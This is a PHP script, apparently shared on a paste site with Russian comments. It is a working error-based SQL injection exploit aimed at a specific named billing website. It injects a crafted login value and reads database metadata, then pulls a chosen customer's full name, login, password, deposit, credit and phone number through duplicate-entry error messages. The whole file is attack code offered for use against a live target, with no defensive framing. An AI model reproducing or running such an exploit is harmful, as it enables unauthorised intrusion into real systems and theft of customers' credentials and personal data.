php set_time_limit false ignore_user_abort true site https billing zug

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
set_time_limit(false);
ignore_user_abort(true);
$site = 'https://billing.zugres.net';
function query($site, $query) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $site,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false
));
curl_setopt_array($ch, array(
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array(
'card' => rand(100000, 999999),
'login' => "' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(($query), 1, 63), FLOOR(RAND(0)*2))) -- '",
'password' => '',
'act' => '1'
)
));
//$res = iconv('koi8-r', 'UTF-8', curl_exec($ch));
$res = curl_exec($ch);
preg_match('/Duplicate entry \'(.*?)\d\'/', $res, $data);
return $data[1];
}
$db = query($site, 'database()');
$user = query($site, 'user()');
$version = query($site, 'version()');
$c_tables = query($site, 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\''.$db.'\'');
echo '<b>Host: </b> ' . $site . '<br/>';
echo '<b>Database: </b> ' . $db . '<br/>';
//echo '<b>User: </b> ' . $user . '<br/>';
//echo '<b>MySQL Version: </b> ' . $version . '<br/>';
//echo '<b>Count tables: </b> ' . $c_tables . '<br/>';
/*echo '<b>Tables:</b><pre>' . "\n-----\n";
$tables = [];
for($i = 0; $i < $c_tables; $i++) {
$tables[] = query($site, 'SELECT table_name FROM information_schema.tables WHERE table_schema=\''.$db.'\' LIMIT '.$i.',1');
echo $tables[$i] . "\n";
}
echo '-----</pre>';*/
echo '<b>Количество юзеров:</b> ' . query($site, 'SELECT COUNT(*) FROM users') . '<br/>';
$uid = query($site, 'SELECT uid FROM users LIMIT 100,1'); //тут меняешь лимит. отсчёт от 0
echo '<b>99 uid из users:</b> ' . $uid . '<br/>';
$fio = query($site, 'SELECT fio FROM users WHERE uid=\''.$uid.'\'');
echo '<b>Его ФИО:</b> ' . $fio . '<br/>';
$user = query($site, 'SELECT user FROM users WHERE uid=\''.$uid.'\'');
echo '<b>Его логин:</b> ' . $user . '<br/>';
$password = query($site, 'SELECT password FROM users WHERE uid=\''.$uid.'\'');
echo '<b>Его пароль:</b> ' . $password . '<br/>';
$deposit = query($site, 'SELECT deposit FROM users WHERE uid=\''.$uid.'\'');
echo '<b>deposit:</b> ' . $deposit . '<br/>';
$credit = query($site, 'SELECT credit FROM users WHERE uid=\''.$uid.'\'');
echo '<b>credit:</b> ' . $credit . '<br/>';
$phone = query($site, 'SELECT phone FROM users WHERE uid=\''.$uid.'\'');
echo '<b>phone:</b> ' . $phone . '<br/>';